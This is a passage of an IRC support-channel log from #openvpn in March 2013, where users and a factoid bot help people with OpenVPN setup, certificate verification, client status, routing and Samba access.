server. With no OpenVPN errors and good logs, firewalls are usually the reason for pings to get lost 19:32 -!- raidz is now known as raidz_away 19:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 19:57 -!- CygniX [~CygniX@unaffiliated/twois10] has quit [Quit: Konversation terminated!] 19:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 20:09 < M1L0> thx... i go see that now.. 20:24 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 245 seconds] 20:29 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 20:29 -!- defswork [~andy@141.0.50.105] has joined #openvpn 20:30 < hrenovo> hmm, on windows 7 just installed openvpn gui, and when I right click on the icon in the task bar, the only two options I see there is 1. Settings 2. Exit 20:30 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 20:30 < hrenovo> No Connection option ) 20:31 < M1L0> first copi files into config folder 20:32 < M1L0> cert, key, ovpn, etc 20:32 < hrenovo> ah! there is no .conf file 20:33 < M1L0> copy client conf files into c;/program files/openvpn/config 20:35 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 260 seconds] 20:36 < hrenovo> M1L0: copi-ing ) 20:37 -!- defswork [~andy@141.0.50.105] has joined #openvpn 20:40 < M1L0> cool 20:50 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 245 seconds] 20:51 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:51 -!- mode/#openvpn [+o krzee] by ChanServ 21:01 < pekster> hrenovo: You too should read and follow the howto guide if you are new to openvpn. It guides you through the entire setup: 21:01 < pekster> !howto 21:01 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:01 < hrenovo> I think I got this figured all out 21:02 < hrenovo> its working perfectly now 21:02 < pekster> Great 21:02 < hrenovo> 4 clients connected 21:02 < hrenovo> my next thing is to figure out how to make clients pingable 21:02 < hrenovo> or even if I should make them pingable or not 21:02 <@krzee> hehe 21:02 < hrenovo> or how to see the list of connected clients 21:02 <@krzee> don't block ping in the firewall = pingable 21:03 < hrenovo> krzee: let me check 21:03 <@krzee> list of connected clients could be a status file (i think) or the management interface (my preferred way) 21:03 < pekster> On the OpenVPN server you can send it a USR2 signal and it will print a "status" output to your logfile (or stdout if you're not using a syslog or logfile) 21:03 < hrenovo> whats the management interface ? 21:03 < pekster> Yes, or the management interface or a status directive 21:03 < pekster> Lots of ways to get status :) 21:04 < pekster> !management 21:04 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 21:04 < pekster> !status 21:04 < pekster> !factoids search status 21:04 <@vpnHelper> No keys matched that query. 21:04 < pekster> !factoids search --values status 21:04 <@vpnHelper> 'webgui' and 'logs' 21:05 < pekster> !learn status as You can use the --status directive to write to a status file to show the list of currently connected clients. This list can be sent to stdout (or your defined !log mechanism) with a USR2 signal as well. 21:05 <@vpnHelper> Joo got it. 21:06 < pekster> !learn status as See also !management 21:06 <@vpnHelper> Joo got it. 21:10 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Quit: This computer has gone to sleep] 21:14 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 256 seconds] 21:22 < RudyValencia> OK so we're generating OpenVPN certificates using OpenSSL according to http://www.macfreek.nl/memory/Create_a_OpenVPN_Certificate_Authority and we are getting the following error: 21:22 <@vpnHelper> Title: Create a OpenVPN Certificate Authority - Exterior Memory (at www.macfreek.nl) 21:22 < RudyValencia> 140282962425512:error:0E06D06C:configuration file routines:NCONF_get_string:no value:conf_lib.c:335:group=CA_default name=email_in_dn 21:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 21:23 < RudyValencia> The error occurs while making a client certificate. 21:37 < hrenovo> I am reading up on the management interface and I am confused ) 21:38 < hrenovo> where do I set --management ? 21:38 < hrenovo> in server.conf ? 21:41 < hrenovo> also, which management GUI is recommended currently? I see a very big list in the wiki here https://community.openvpn.net/openvpn/wiki/RelatedProjects 21:41 <@vpnHelper> Title: RelatedProjects – OpenVPN Community (at community.openvpn.net) 21:43 < pppingme> gui? its easy to setup and use if you understand the concepts involved.. 21:43 < pekster> hrenovo: We don't really recommend any GUI. OpenVPN is at its core a command line tool, and thus the best way to interact with it is at the command line 21:47 < hrenovo> pekster: understood. Any way to see currently connected clients ? 21:48 < hrenovo> pekster: using command line 21:48 < hrenovo> pekster: you mentioned management interface, but I am not sure how to enable it. where do I set --management ? in server.conf ? 21:52 -!- Thermi_ [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Ping timeout: 240 seconds] 21:53 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 21:55 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 21:56 < pekster> hrenovo: Yes, see the manpage and look for the --management option. Or, as stated earlier: 21:56 < pekster> !status 21:56 <@vpnHelper> "status" is (#1) You can use the --status directive to write to a status file to show the list of currently connected clients. This list can be sent to stdout (or your defined !log mechanism) with a USR2 signal as well. or (#2) See also !management 21:57 < pekster> You have 3 ways to show the connected clients. Pick one. 22:00 < robert___> is there a way to tell a "server" from a "client" via the ifconfig-up script or something? 22:00 -!- robert___ is now known as robert_ 22:00 < robert_> (like, does it push certificate information into the environment when it runs the script) 22:02 < pekster> You configure a server vs client differently, thus asking to distinguish them at runtime seems a strange thing to do 22:02 < pekster> What's your usecase? 22:04 -!- hrenovo_ [~hrenovo@li469-37.members.linode.com] has joined #openvpn 22:04 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Read error: Connection reset by peer] 22:05 < hrenovo_> sorry just got disconnected for a sec 22:06 < hrenovo_> I have uncommented client-to-client but I cannot see any other nodes in network center 22:06 -!- hrenovo_ is now known as hrenovo 22:07 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 22:07 < robert_> we have two classes of endpoint that will be connecting (signed by the same CA) with separate different keyUsages; I want to tell one keyUsage from the other so I can enable client-to-client for one class, but not the other. 22:09 < robert_> "server" roles are supposed to be unrestricted, while "client" roles are supposed to only consume the services "server" roles provide. 22:09 < rob0> client-to-client is global, is it not? 22:13 < robert_> oh wait, I may be over-thinking here. 22:13 -!- ngharo_ [~ngharo@hacked.thegov.us] has joined #openvpn 22:13 -!- master_of_master [~master_of@p4FF24861.dip.t-dialin.net] has joined #openvpn 22:13 -!- matsh_ [divine@nanogene.org] has joined #openvpn 22:13 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 240 seconds] 22:13 -!- ngharo [~ngharo@hacked.thegov.us] has quit [Ping timeout: 240 seconds] 22:13 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 240 seconds] 22:13 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 240 seconds] 22:13 -!- matsh_ is now known as matsh 22:13 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 22:14 -!- defswork [~andy@141.0.50.105] has joined #openvpn 22:14 -!- master_o1_master [~master_of@p4FF24CB8.dip.t-dialin.net] has quit [Read error: Operation timed out] 22:14 -!- ngharo_ is now known as ngharo 22:18 -!- master_o1_master [~master_of@p4FF243C7.dip.t-dialin.net] has joined #openvpn 22:20 -!- master_of_master [~master_of@p4FF24861.dip.t-dialin.net] has quit [Ping timeout: 258 seconds] 22:22 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 22:24 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 22:29 < RudyValencia> OK so we are trying to set up a link between a remote OpenVPN server in Dallas and a local OpenVPN server here in Colorado. Is it possible to join two instances of OpenVPN like this to create a VPN-based intranet? 22:29 < RudyValencia> basically, can the two servers communicate with each other, and can the local server provide remote services to clients through the link? 22:30 < pppingme> lots of variables, but what I would do is create a simple p2p link between the two sites and either static route or run a routing protocol to get routing correct between both sides 22:31 < pekster> robert_: What you really want is to firewall clients dynamically as they connect. Don't use client-to-client so that the traffic is pushed to your kernel and you can firewall the traffic in the standard way for your OS 22:31 < pekster> robert_: Use --client-connect for that, and then you can use the environmental variables to use whatever you'd like to apply firewall rules to that connection. You likely want to pair --client-disconnect with that to remove the dynamic rules when a client disconnects 22:34 < RudyValencia> The Colorado OpenVPN service is running on a TP-Link router with OpenWRT, if that introduces a bit of clarity. 22:35 < robert_> I was asking if 'nsCertType server' clients certificates could be accessed (by default) by type 'nsCertType Client' client certificates. 22:35 < robert_> client certificates* 22:36 < pekster> could be accessed by? 22:36 < robert_> once they're on the vpn I mean 22:37 < pekster> Sure 22:38 < pekster> Certificates have nothing to do with the data flow; they're used purely as an authentication mechanism, and you can hook into it on either end to preform additional connection checks or dynamic rules based on any of the X509 fields 22:38 -!- matsh_ [divine@nanogene.org] has joined #openvpn 22:38 < pekster> Generally, you want clients to verify that they're reaching a server cert to prevent MITM attacks from other valid client certs: 22:38 < pekster> !mitm 22:38 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 22:39 < pekster> --remote-cert-tls is the new version of --ns-cert-type and should be used instead of the deprecated "Netscape" extensions. As cool as Netscape Navigator is... 22:39 -!- matsh [divine@nanogene.org] has quit [Ping timeout: 240 seconds] 22:39 -!- matsh_ is now known as matsh 22:39 < pekster> They both functionally do the same thing 22:42 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 22:42 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 22:54 < RudyValencia> We setup extended key usage attributes 22:55 < RudyValencia> the server certs only have serverAuth and the client certs only have clientAuth 23:02 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Ping timeout: 252 seconds] 23:03 < pekster> RudyValencia: Great, then you might want to use the --remote-cert-eku option. Be aware that --remote-cert-tls requires an *exact* match on the ku+eku fields, so that may not be suitable 23:04 < pekster> I too prefer eku as my keying feature for server/client, and generally like to do: --remote-cert-eku "TLS Web Server Authentication" in my client config files. This prevents MITM attacks by naughty clients, and lets me use just the eku if I choose 23:04 < pekster> You may use the display name or the OID to match on ku/eku values 23:09 -!- JStoker [jstoker@claire.jcs.me.uk] has joined #openvpn 23:09 -!- JStoker [jstoker@claire.jcs.me.uk] has quit [Changing host] 23:09 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 23:09 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has quit [Remote host closed the connection] 23:09 -!- Poster [~poster@cpe-184-57-119-105.columbus.res.rr.com] has joined #openvpn 23:14 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 240 seconds] 23:15 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 23:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 258 seconds] 23:18 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 23:27 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has quit [Quit: I quit] 23:37 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 264 seconds] 23:40 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has joined #openvpn 23:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 23:53 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has quit [Read error: Connection reset by peer] 23:54 -!- Matir_ [~matir@ubuntu/member/matir] has quit [Ping timeout: 260 seconds] 23:58 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has joined #openvpn --- Day changed Wed Mar 20 2013 00:07 -!- Matir [~matir@ubuntu/member/matir] has joined #openvpn 00:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 00:14 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 00:41 -!- M1L0 [~M1L0@200.106.37.56] has quit [Quit: Saliendo] 00:43 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 00:47 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 00:49 -!- RudyValencia [~self@unaffiliated/rudyvalencia] has quit [Read error: Connection reset by peer] 00:53 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Quit: WeeChat 0.3.8] 00:55 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 01:09 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 258 seconds] 01:13 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 01:16 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has quit [Ping timeout: 252 seconds] 01:22 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has joined #openvpn 01:33 -!- brute11k [~brute@89.249.231.107] has joined #openvpn 01:34 -!- master_of_master [~master_of@p4FF24B99.dip.t-dialin.net] has joined #openvpn 01:38 -!- master_o1_master [~master_of@p4FF243C7.dip.t-dialin.net] has quit [Ping timeout: 260 seconds] 01:42 -!- novaflash_away is now known as novaflash 01:50 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds] 01:56 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 01:57 -!- dazol [~dazo@2001:470:de40:1021::14] has joined #openvpn 01:57 -!- dazol is now known as dazo 01:57 -!- dazo [~dazo@2001:470:de40:1021::14] has quit [Changing host] 01:57 -!- dazo [~dazo@openvpn/community/developer/dazo] has joined #openvpn 01:57 -!- mode/#openvpn [+o dazo] by ChanServ 02:17 -!- brute11k [~brute@89.249.231.107] has quit [Quit: Leaving.] 02:22 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 03:28 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 03:33 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 03:36 -!- Diffen [~diffen@80.78.212.242] has joined #openvpn 03:42 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn 04:11 -!- Diffen [~diffen@80.78.212.242] has quit [Quit: Leaving] 04:18 * EugeneKay gives pekster a cookie 04:22 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 04:25 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 04:32 -!- JacquesBH [~jacques@unaffiliated/jacquesbh] has quit [Remote host closed the connection] 04:55 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Ping timeout: 245 seconds] 04:57 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 04:57 -!- zeroXten [~zeroXten@0x10.co.uk] has quit [Client Quit] 04:58 -!- zeroXten [~zeroXten@0x10.co.uk] has joined #openvpn 05:01 -!- xbanux [~xbanux@triband-mum-59.182.152.25.mtnl.net.in] has quit [Remote host closed the connection] 05:02 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has joined #openvpn 05:30 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has quit [Ping timeout: 276 seconds] 05:39 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has joined #openvpn 05:45 -!- JSharpe__ is now known as JSharpe 05:59 -!- tekzilla [~jon@24.134.142.157] has joined #openvpn 06:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 06:01 < tekzilla> hey, i'm trying to use 'route-nopull' followed by some 'route' statements in client-config on the server (ccd) 06:01 < tekzilla> but the server logs says the "cannot be used in this context" 06:01 < tekzilla> *they 06:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 06:04 <@EugeneKay> That's because that's a --client option 06:05 <@EugeneKay> You're probably looking for --push-reset 06:07 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 06:08 < tekzilla> aah ok, thanks! 06:10 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 06:10 -!- kls [~kls@198.211.125.123] has joined #openvpn 06:10 < kls> hello! 06:12 < kls> General question — is it possible for clients to access each others' SMB shares over a routed connection? 06:12 < kls> Or is it only possible over bridged ones? 06:12 < MacGyver> Let me see. 06:12 < MacGyver> !smb 06:13 < MacGyver> No factoid for that? 06:13 < MacGyver> kls: The answer is in the howto. 06:13 < MacGyver> http://openvpn.net/index.php/open-source/documentation/howto.html#samba 06:13 <@vpnHelper> Title: HOWTO (at openvpn.net) 06:13 < MacGyver> Have fun. 06:14 < MacGyver> Oh, that's not even the right link. 06:14 < MacGyver> Sec. 06:16 < MacGyver> http://openvpn.net/index.php/open-source/documentation/howto.html#config 06:16 <@vpnHelper> Title: HOWTO (at openvpn.net) 06:16 < MacGyver> (It's still the howto) 06:16 < MacGyver> You'll need to check what you need to uncomment for client-to-client traffic. 06:17 < MacGyver> It's probably "client-to-client", since openvpn has the habit of using sensible names for config directives. 06:21 < tekzilla> look at OpenvVPN go! :) 06:22 <@EugeneKay> kls - yes, totally. Should work just fine over routed, with the appropriate firewall rules 06:22 <@EugeneKay> If you want name resolution you'll need DNS and/or WINS 06:22 <@EugeneKay> !wins 06:22 <@vpnHelper> "wins" is http://oreilly.com/catalog/samba/chapter/book/ch07_03.html is a good link for seeing how to run WINS on samba 06:26 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 06:28 < kls> EugeneKay, MacGyver, thanks! 06:28 < kls> Hmm, let's try this 06:29 < kls> !iptables 06:29 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 06:29 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 06:29 < kls> really cool. :) 06:30 < jzaw> EugeneKay, may i ask for a memory prompt re /30 and tun/tap endpoints 06:30 < kls> thanks guys 06:30 <@EugeneKay> !/30 06:30 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 06:30 <@EugeneKay> See #5 ^ 06:30 < jzaw> im aabout to ask my isp for either /30 if itll do or a /29 if necessary 06:31 <@EugeneKay> For what? 06:31 <@EugeneKay> Giving vpn clients publically-routable VPN IPs? 06:31 < jzaw> all ready have that working 06:31 < jzaw> but my tap0 's are 10.0.0.x 06:31 < jzaw> and when i trace from the router itself ... it doesnt 06:32 < jzaw> as my server end is no nat 06:32 <@EugeneKay> !goal ? 06:32 <@EugeneKay> !goal 06:32 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 06:32 < jzaw> proper tracing and debuging ... if i give them proper ips i can both trace from the router and too its vpn tap 06:33 <@EugeneKay> There's nothing improper about RFC1918 space 06:33 <@EugeneKay> You just need to tell your router how to reach VPN clients..... via a route 06:34 < jzaw> thats done afaik 06:34 < jzaw> i can reach hosts behind the vpn 06:34 < jzaw> client hosts behind the vpn 06:34 < jzaw> from without 06:34 < jzaw> ie YOU can reach them 06:35 < jzaw> but theres no way for you to ping the tap0 06:35 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 06:35 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off!] 06:40 <@EugeneKay> So? Unless your vpn clients are providing a service to the outside world there isn't much reason for somebody to need to reach them from the internet at-large 06:41 <@EugeneKay> Even if they are, just do a NAT on the port you need them to be reachable on. 06:41 <@EugeneKay> No need to waste public IPv4s 06:49 < kls> Samba SUCKS so much. When will we have a new protocol replacing it? Why can't, say, AFP become the standard? 06:59 <@EugeneKay> Because AFP is even worse 07:00 < kls> Isn't there anything else? 07:00 <@EugeneKay> SMB isn't going away any time soon; it's pretty deeply entrenched in AD & family 07:01 < kls> It seems quite limited at times. And mostly because of — drumroll – windows clients not being able to comprehend e.g. proper write-only access. 07:02 < kls> Or the major suck with unicode filenames. 07:02 <@EugeneKay> FWIW, Windows is the reference implementation 07:03 < kls> Yes... And that's why I don't understand why we have to kindof force it on the rest of the world. 07:03 <@EugeneKay> Because Samba is the minority? 07:03 < kls> What is the majority then? I honestly don't know the bigger alternatives 07:03 <@EugeneKay> Windows? 07:04 < kls> Ah, OK. Yes. 07:04 < kls> Sorry. :) 07:04 < kls> Got it. 07:04 < kls> Under "Samba" I meant "Windows file sharing protocol", whatever its proper name should be. 07:05 <@EugeneKay> Also remember that SMB covers a lot more than just file sharing - it also does printers, raw serial ports, RPCs.... 07:05 <@EugeneKay> Bits and pieces of this are done in other protocols(SFTP for example), but no one protocol does all of it 07:05 <@EugeneKay> It's really the building block for Windows Network Operating System, aka AD-DS 07:05 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 07:05 <@EugeneKay> You can't just toss that out the window 07:06 <@EugeneKay> And despite your rantings, it really is rather performant. I regularly use it across WAN links with no issues aside from the expected amount of lag. 07:06 <@EugeneKay> With non-Windows implementations ;-) 07:06 <@EugeneKay> It comes down to configuring your servers & clients properly 07:08 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 07:08 -!- mode/#openvpn [+o plaisthos] by ChanServ 07:10 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has quit [Ping timeout: 245 seconds] 07:13 -!- JackSparrow [~death@2001:41d0:1:d4e5:dead::42] has joined #openvpn 07:21 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Quit: Main screen turn off!] 07:41 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 07:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:49 -!- brute11k [~brute@89.249.231.173] has joined #openvpn 07:50 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 07:50 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has quit [Ping timeout: 276 seconds] 07:52 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has joined #openvpn 08:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:00 < Valcorb> up 08:02 < kls> EugeneKay: yes, I think so. I jsut had massive problems w/ setting up a proper SMB server under OSX Mountain Lion 08:02 < kls> Partly because of Apple's wise move of writing yet another SMB implementation 08:04 < kls> Not optimal at all. 08:07 -!- tcamuso_ [tcamuso@nat/redhat/x-stzdjglvmiahqwgn] has joined #openvpn 08:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 08:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:16 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 08:16 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Remote host closed the connection] 08:18 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn 08:33 -!- xbanux [~xbanux@triband-mum-59.182.147.208.mtnl.net.in] has quit [] 08:49 -!- corretico [~luis@190.211.93.38] has joined #openvpn 08:58 -!- pyrobisqit [~pyrobisqi@87.red-88-5-221.dynamicip.rima-tde.net] has joined #openvpn 08:58 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:59 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 08:59 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 09:00 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Client Quit] 09:11 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has quit [] 09:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 09:19 -!- Orbi [~opera@anon-186-54.vpn.ipredator.se] has joined #openvpn 09:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:29 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:56 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 09:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 09:58 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:04 -!- erry [erry@freenode/staff/erry] has quit [Quit: Reconnecting] 10:04 -!- kls [~kls@198.211.125.123] has left #openvpn [] 10:04 -!- erry [erry@freenode/staff/erry] has joined #openvpn 10:16 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 10:17 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 10:19 -!- raidz_away is now known as raidz 10:24 -!- star314 [~star314@xchg.fiss-oeaw.at] has joined #openvpn 10:24 -!- star314 [~star314@xchg.fiss-oeaw.at] has quit [Max SendQ exceeded] 10:25 -!- star314 [~star314@xchg.fiss-oeaw.at] has joined #openvpn 10:25 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:30 < jzaw> [11:41:10] No need to waste public IPv4s 10:30 < jzaw> hehe 10:31 < jzaw> i make it my personal mission to use up the european ipv4's ... bring on ipv6 ! 10:31 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 10:38 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 10:38 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 10:38 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 10:38 -!- mode/#openvpn [+o krzee] by ChanServ 10:39 < Rienzilha> :) 10:42 <@ecrist> >:-) 10:42 < pekster> jzaw: RFC6598 allows for ISPs to use NAT. Plenty of ways to avoid IPv6 if someone needs an excuse. Until we want IPv6 enough it won't come much faster than it does today 10:44 < jzaw> aye pekster and some numpty will bringout NAT6 10:44 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Remote host closed the connection] 10:44 < Rienzilha> and until it's there we won't want it 10:44 < pekster> It's already here. You're not supposed to need it, but that doesn't stop poor implementation. Hopefully consumers can mitigate that with enough alternatives 10:45 < Rienzilha> well the technology is there, but no end user needs it 10:45 < pekster> They might if an ISP only allocates a single /64 to a home network 10:45 < Rienzilha> no company in their right mind would set up services exclusively on ipv6 10:45 < Rienzilha> pekster: that isp would go bankrupt quickly :D 10:45 < pekster> Oh, "it" being IPv6, not NAT6 10:45 < Rienzilha> yeah ipv6 10:45 < jzaw> we dont need a spare hole in the head but someone invented trepanning 10:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 10:46 -!- dlucio [~dieu@CPEbcc8100f9978-CMbcc8100f9975.cpe.net.cable.rogers.com] has joined #openvpn 10:46 <@ecrist> I doubt anyone is going to do NAT6 at the ISP level 10:46 < dlucio> hello people 10:46 < dlucio> little question 10:47 < dlucio> does windows8 has problems with openvpn 2.2.2? 10:48 <@ecrist> yes 10:48 <@ecrist> why would you run 2.2.2? 2.3.0 is what you should run 10:49 < jzaw> hehe tell that to debian wheezy ecrist 10:49 <@krzee> !repo 10:49 <@vpnHelper> "repo" is openvpn runs some software repositories for your installing pleasure, http://community.openvpn.net/openvpn/wiki/OpenvpnSoftwareRepos 10:49 <@krzee> you tell it to your distro 10:49 <@krzee> heh 10:51 <@EugeneKay> One of these days I'll relearn to package RPMs 10:51 < dlucio> ecrist, i know it is for a distro packaging, mageia is freezed now, and i canonly push 2.3 if there is a good reason 10:51 < dlucio> such as windows8 incompatibility for example 10:52 < dlucio> i need to know if there is a good reason to push 2.3 , not only to be in the fancy edge or releases 10:52 <@ecrist> jzaw: his questions qwas about windows 8, not debian 10:52 <@ecrist> dlucio: you can use 2.3.0 as a client for a 2.2.2 server 10:53 <@ecrist> but not the other way around as reliably 10:53 -!- star314 [~star314@xchg.fiss-oeaw.at] has quit [Ping timeout: 245 seconds] 10:53 < dlucio> is ip6 support on 2.3 better than 2.2.2? 10:53 < jzaw> yes sorry i injected a little irony since debian wheezy is on 2.0something 